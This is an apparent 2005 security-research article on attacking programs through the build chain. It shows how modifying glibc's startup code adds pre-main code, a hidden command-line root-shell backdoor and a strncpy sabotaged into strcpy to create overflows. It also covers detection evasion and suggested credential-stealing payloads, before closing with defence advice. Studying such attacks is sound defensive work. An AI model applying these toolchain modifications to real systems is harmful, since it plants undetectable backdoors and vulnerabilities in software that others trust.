The Compiler as Attack Vector

Software

by David Maynor

on January 5, 2005

Media exposure of serious security threats has sky-rocketed in the last five years, and this has caused a strange parallel to develop. As software developers have become more aware of security problems and have taken steps to mitigate them during the development phase, attackers have been forced to become more insidious in exploit vectors. A possible vector that often is not explored is attacking the program as it is built.

I first encountered this idea while reading the September 1995 ACM classic of the month article “Trusting Trust”, by Ken Thompson. The article originally appeared in the August 1984 issue of Communications of the ACM, and it deals with the belief that ultimate security is impossible to achieve because in the chain of building an application there is no way to trust every link fully. The particular focus was on the C compiler for UNIX and how, within the build process, the programmer can be blind to the compiler's actions.

The same problem still exists currently. Because so many things in the Linux world are downloaded and compiled, an avenue of attack opens. Binary distributions like RPMs and Debian packages are becoming increasingly popular; thus, attacking the build machines for the distributions would yield many unsuspecting victims.

GCC and Glibc

Before engaging in a discussion of how such attacks could take place, it is important to become familiar with the target, and how someone would evaluate it for places to attack. GCC, written and distributed by the GNU Project, supports many languages and architectures. For the sake of brevity, we focus on ANSI C and the x86 architecture in this article.

The first task is to become more familiar with GCC—what it does to code and where. The best way to start this is to build a simple Hello World program, passing GCC the -v option at compile time. The output should look something similar to that shown in Listing 1. Examining it yields several important details, as GCC is not a single program. It invokes several programs to translate the c source file into an ELF binary. It also links in numerous system libraries with virtually no verification that they are what they appear to be.

Further information can be gained by repeating the same build with the -save-temps options. This saves the intermediate files created by GCC during the build. In addition to the binary and source file, you now have filename.i, filename.s and filename.o. The .i file contains your source after preprocessing, the .s contains the translated assembly and the .o is the assembled file before any linking happens. Using the file command on these files provides some information as to what they are.

Listing 1. gcc -v


$gcc -v tst.c
<snipped for length>
 as -V -Qy -o /tmp/ccAkwBG3.o /tmp/cczFkUQ2.s
GNU assembler version 2.13.90.0.18 (i586-mandrake-linux-gnu)
using BFD version 2.13.90.0.18 20030121
/usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.2.2/collect2
--eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2
/usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.2.2/../../../crt1.o
/usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.2.2/../../../crti.o
/usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.2.2/crtbegin.o
-L/usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.2.2
-L/usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.2.2/../../.. /tmp/ccAkwBG3.o
-lgcc -lgcc_eh -lc -lgcc -lgcc_eh
/usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.2.2/crtend.o
/usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.2.2/../../../crtn.o
$

The thing to focus on while looking through the temp files is the type and amount of code added at each step, as well as where the code comes from. Attackers look for places where they can add code, often called payloads, without being noticed. Attackers also must add statements somewhere in the flow of a program to execute the payload. For attackers, ideally this would be done with the least amount of effort, changing only one or two files. The phase that covers both these requirements is called the linking phase.

The linking phase, which generates the final ELF binary, is the best place for attackers to exploit to ensure that their changes are not detected. The linking phase also gives attackers a chance to modify the flow of the program by changing the files that are linked in by the compiler. Examining the verbose output of the Hello World build, you can see several files like ld_linux.so.2 linked in. These are the files an attacker will pay the most attention to because they contain the standard functions the program needs to work. These collections are often the easiest in which to add a malicious payload and the code to call it, often by replacing only a single file.

Let's take a small aside here and discuss some parts of ELF binaries, how they work and how attackers can use this to their advantage. Ask many people who write C code where their programs begin executing and they will say “main”, of course. This is true only to a point; main is where the code they wrote begins execution, but in actuality, the code started executing long before main. You can examine this with tools like nm, readelf and gdb. Executing the command readelf --l hello shows the entry point for the program. This is where the program begins executing. You then can look at what this does by setting a breakpoint for the entry point, and then run the program. You will find the program actually starts executing at a function called _start, line 47 of file <glibc-base-directory>/sysdeps/i386/elf/start.S. This is actually part of glibc.

Attackers can modify the assembly directly, or they can trace the execution to a point where they are working with C for easier modifications. In start.S, __libc_start_main is called with the comments Call the user's main function. Looking through the glibc source tree brings you to <glibc-base-directory>/sysdeps/generic/libc-start.c. Examining this file, you see that not only does this call the user's main function, it also is responsible for setting up command-line and environment options, like argc, argv and evnp, to pass to main. It is also in C, which makes modifications easier than in assembly. At this point, making an effective attack is as simple as adding code to execute before main is called. This is effective for several reasons. First, in order for the attack to succeed, only one file needs to be changed. Second, because it is before main(), typical debugging does not discover it. Finally, because main is about to be called, all the built-ins that C coders expect already have been set up.

Attack

Now that we have completed a general introduction to GCC and the parts of interest, we can apply the knowledge to attacks. The simplest attack is to add new functionality, evoked by a command-line option. Let's attack libc-start.c, because it is easier to wait for command-line options to be set up for us rather than by doing it with our own code.

This type of work should be done on a machine of little importance, so that it can be re-installed when necessary. The version of glibc used here is 2.3.1, built on Mandrake 9.1. After the initial build, which will be lengthy, as long as the build isn't cleaned, future compiles should be pretty quick.

The first example makes simple text appear before and after the main body executes. In order to do this, the library that is linked in by the compiler is modified. The modifications to libc-start.c simply add a hello and good-bye message that is displayed as the program runs. The modifications include adding stdio.h as a header and two simple printf statements before and after main, as shown in Listing 2. With these simple changes made, kick off another build of glibc and wait.

Listing 2. Modifications to the libc-start.c for Hello World


/* XXX This is where the try/finally handling
must be used.  */
printf("Before main()\n");
result = main (argc, argv, __environ);
printf("After main()\n");

Waiting until the build is finished is not necessary. You can build programs from the compile directory without risking machine usability due to a faulty glibc install. Doing this requires some tricky command-line options to GCC. For simplicity of demonstration, the binary is built statically, as shown in Listing 3. The program compiled is a simple Hello World program.

Listing 3. GCC Command Line to Compile hello.c

}
$gcc -nostdlib -nostartfiles -static -o
/home/dave/code/lj/hello /home/dave/code/lj/build_glibc/csu/crt1.o
/home/dave/code/lj/build_glibc/csu/crti.o
`gcc --print-file-name=crtbegin.o` /home/dave/code/lj/hello.c
/home/dave/code/lj/build_glibc/libc.a -lgcc
/home/dave/code/lj/build_glibc/libc.a `gcc --print-file-name=crtend.o`
/home/dave/code/lj/build_glibc/csu/crtn.o
$./hello
Before main()
Hello World
After main()
$

Pay close attention to nostdlib, nostartfiles and static. These options are followed by the paths of libraries for the common C library, as well as standard libs like -lgcc. These strange options instruct GCC not to build in the standard libraries and startup functions. This allows us to specify exactly what we want linked in and where. After the compile is complete, we are left with a hello ELF binary as expected, but it is much larger than normal. This is a side effect of building the program statically, meaning that the required functions are built within the program, rather than relying on them to be loaded on an as-needed basis. Running the binary results in our messages being displayed before and after the hello world message, and it verifies that we can indeed execute code before the developer intends.

A real attacker would not have to build statically and could subvert the system copy of glibc in place so that executables would look normal.

Looking back at the libc-start source file, it's easy to tell that this function sets up argc, argv and evnp before calling main(). Moving on from displaying text, the execution of a shell is the next step. Because modifications of this gravity are such that an attacker would not want someone to know they exist, this shell executes only if the correct command-line option is passed. The source file already includes unistd.h, so it is simple and tempting to use getopt to parse the command-line options before main() is called. Although this will work, it can lead to discovery if getopt errors out due to unknown options. I wrote a brief snippet of code that searches argv for the option to invoke the shell, as shown in Listing 4. When you exit the shell, you will notice the program continues operating normally. Unless you knew the option used to start the shell, more than likely you never would have known this back door existed.

Listing 4. Changes to libc-start for Parsing Command-Line Options


$cat hello.c
#include <stdio.h>

int main()
{
        printf("Hello World\n");
        return 0;
}
$ <GCC build snipped for length, see Listing 3 for options>
$./hello
Before main()
Looking for cmdln opt
I love Marisa
After main()
$./hello -O
Before main()
Looking for cmdln opt
OWNED
sh-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05b#exit
exit
Hello World
After main()
$

The previous examples are interesting, but they really don't do anything noteworthy. The next example adds a unique identifier to every binary built with GCC. This is most useful in honeypot-like environments where it is possible an unknown party will build a program on the machine, then remove it. The unique identifier, coupled with a registry, can help a forensics analyst trace a program back to its point of origin and establish a trail to the intruder.

Listing 5. Adding a Unique ID Function

Code added to libc-start.c
void __ID_abcdefghijklmnopqrstuvwxyz( void )
{
}

The output, after compile:
$nm -p hello | grep ID
080966e0 r _nl_value_type_LC_IDENTIFICATION
08048320 T __ID_abcdefghijklmnopqrstuvwxyz
080a5e00 R _nl_C_LC_IDENTIFICATION
$

There could be much debate about what the unique identifier should be and how it should be generated. To avoid a trip to Crypto 101, the identifier is a generic 26-character string. To prevent immediate detection, the identifier is added as a void function that is visible using nm. Its name is __ID_abcdefghijklmnopqrstuvwxyz(). This is added to libc-start.c. After rebuilding glibc and compiling the test program, the value is visible. The value I chose is for demonstration purposes. In reality, the more obscure and legitimate sounding the identifier, the harder it is to detect. My choice for a name in a real scenario would be something like __dl_sym_check_load(). In addition to tagging the binary at build, a token could be inserted that would create a single UDP packet, with the only payload being the IP address of the machine on which it is running. This could be sent to a logging server that could track what binaries are run in what places and where they were built.

One of the more interesting elements of this attack vector is the ability to make good code bad. strcpy is a perfect example of this function, because it has both an unsafe version and a safe one, strncpy, which has an additional argument indicating how much of a string should be copied. Without reviewing how a buffer overflow works, strcpy is far more desirable to an attacker than its bounds-checking big brother. This is a relatively simple change that should not attract too much attention, unless the program is stepped through with a debugger. In the directory <glibc-base>/sysdeps/generic, there are two files, strcpy.c and strncpy.c. Comment out everything strncpy does and replace it with return strcpy(s1,s2);.

Using GDB, you can verify that this actually works by writing a snippet of code that uses strncpy, and then single stepping through it. An easier way to verify this is to copy a large string into a small buffer and wait for a crash like the one shown in Listing 6.

Listing 6. strncpy Program and Results


strncpy function in <glbc-base>/sysdeps/generic/strncpy.c
char *
strncpy (s1, s2, n)
     char *s1;
     const char *s2;
     size_t n;
{
        return strcpy(s1, s2);
}

$cat strcpy.c
#include <stdio.h>
#include <string.h>
int bob(char *aa)
{
        char b[4];

        strncpy(b, aa, sizeof(b));
        return 0;
}

int main()
{
        char *a="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
        bob(a);
        return 0;
}

$<compile is same as fig. 3 with strcpy.c instead of hello.c>
$gdb ./str
strcpy     strcpy.c   strcpy2    strcpy2.c
$gdb ./strcpy
<snip for length>
This GDB was configured as "i586-mandrake-linux-gnu"...
(gdb) run
Starting program: /home/dave/code/lj/strcpy
Before main()
Looking for cmdln opt

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) print $eip
$1 = (void *) 0x61616161
(gdb)
<And to show strcpy still works>
int bob(char *aa)
{
        char b[50];

        strncpy(b, aa, sizeof(b));
        printf("%s\n", b);
        return 0;
}

int main()
{
        char *a="Thats all folks";
        bob(a);
        return 0;
}
_________________________________________
$./strcpy
Before main()
Looking for cmdln opt
Thats all folks
After main()
$

Depending on the function of the code, it may be useful only if it is undiscovered. To help keep it a secret, adding conditional execution code is useful. This means the added code remains dormant if a certain set of circumstances are not met. An example of this is to check whether the binary is built with debug options and, if so, do nothing. This helps keep the chances of discovery low, because a release application might not get the same scrutiny as a debug application.

Defense and Wrap-Up

Now that the whats and the hows of this vector have been explored, the time has come to discuss ways to discover and stop these sorts of attacks. The short answer is that there is no good way. Attacks of this sort are not aimed at compromising a single box but rather at dispersing trojaned code to the end user. The examples shown thus far have been trivial and are intended to help people grasp the concepts of the attack. However, without much effort, truly dangerous things could emerge. Some examples are modifying gpg to capture passphrases and public keys, changing sshd to create copies of private keys used for authentication, or even modifying the login process to report user name and passwords to a third-party source. Defending against these types of attacks requires diligent use of host-based intrusion-detection systems to find modified system libraries. Closer inspection at build time also must play a crucial role. As you may have discovered looking at the examples above, most of the changes will be made blatantly obvious in a debugger or by using tools like binutils to inspect the final binary.

One more concrete method of defense involves profiling all functions occurring before and after main executes. In theory, the same versions of glibc on the same machine should behave identically. A tool that keeps a known safe state of this behavior and checks newly built binaries will be able to detect many of these changes. Of course, if attackers knew a tool like that existed, they would try to evade it using code that would not execute in a debugger environment. The most important bit of knowledge to take away from this article is not the internal workings of glibc and GCC or how unknown modifications can affect a program without alerting the developer or the end user. The most important thing is that, in this day and age, anything can be used as a tool to undermine security—even the most trustworthy staples of standard computing.

Resources for this article: www.linuxjournal.com/article/7929.

David Maynor is a research engineer with the ISS Xforce R&D team. He spends his day thinking of new ways to break things before the bad guys do. He can be reached at dmaynor@iss.net.

Load Disqus comments